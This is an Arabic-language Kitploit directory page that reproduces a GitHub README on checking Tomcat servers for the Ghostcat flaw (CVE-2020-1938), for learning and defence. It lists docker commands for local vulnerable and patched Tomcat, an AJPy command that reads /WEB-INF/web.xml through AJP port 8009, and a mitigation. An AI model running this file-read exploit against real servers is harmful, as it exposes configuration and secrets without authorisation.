Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ghostcat-verification — دروس مستفادة حول كيفية التحقق من التعرض لثغرة Ghostcat (المعروفة أيضًا باسم CVE-2020-1938) | Kitploit
أدوات/GitHubGitHub/shaunmclernon/ghostcat-verification
تحليل الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubshaunmclernon/ghostcat-verification

ghostcat-verification

دروس مستفادة حول كيفية التحقق من التعرض لثغرة Ghostcat (المعروفة أيضًا باسم CVE-2020-1938)

عرض المستودع
112منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

التحقق من Ghostcat (CVE-2020-1938)

ملخص

تم اكتشاف استغلال جديد يُسمى Ghostcat CVE-2020-1938، راجع المقالات على snyk وtenable للحصول على تفاصيل وتحليل الاستغلال نفسه.

في حالتي، أردت التحقق من خوادم Tomcat التي يمكن استغلالها، وإذا كان الأمر كذلك، فكيف يظهر الاستغلال. لذا هذه التجربة هي لفحص Tomcat 7 و8 و9.

المتطلبات الأساسية

  • docker
  • python
  • git

قراءة الملف باستخدام CVE-2020-1938 على Tomcat 7

TODO: كيف تتحقق من أن Tomcat 7 معرض للثغرة؟

قراءة الملف باستخدام CVE-2020-1938 على Tomcat 8

بدلاً من اختبار الاستغلالات على خوادم حية، أستخدم نسخًا جاهزة من Tomcat لإجراء تجربتي باستخدام AJPy الذي ينشئ طلبات AJP للتواصل مع موصلات AJP.

root@kitploit:~
git clone --recurse-submodules [email protected]:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

إذا أرجعت هذه الأوامر ملف web.xml، فإن هذا الإصدار من Tomcat معرض للثغرة.

إذا جرّبنا الاختبار نفسه باستخدام أحدث إصدار من Tomcat 8.5، فسنرى أنه ليس معرضًا لهذا الخطأ تحديدًا.

root@kitploit:~
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

في هذه الحالة، يجب أن نحصل على خطأ من Python، وهو ما يعني في الواقع أن الخادم غير معرض للثغرة؛

root@kitploit:~
Traceback (most recent call last):
  File "tomcat.py", line 377, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
    ...
    ...
struct.error: unpack requires a buffer of 5 bytes

قراءة الملف باستخدام CVE-2020-1938 على Tomcat 9

TODO: كيف تتحقق من أن Tomcat 9 معرض للثغرة؟

Springboot

TODO: كيف تتحقق من أن خدمة Springboot معرضة للثغرة؟

التخفيف

من الواضح أنه إذا كان الخادم معرضًا للثغرة (بغض النظر عن الإصدار)، فيجب أن تفكر في الترقية إلى الإصدارات المصححة. وهناك خيار آخر وهو حظر الوصول إلى منفذ AJP.

شغّل نفس إصدار Tomcat ولكن دون كشف منفذ AJP 8009.

root@kitploit:~
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

في هذه الحالة، سنجد أن الاستغلال سيفشل.

إخلاء المسؤولية

أنا لست متخصصًا في الأمن، وقد أُنشئ هذا المستودع لأغراض تعلمي، وليس المقصود استخدامه لأغراض خبيثة.

تنزيل الأداة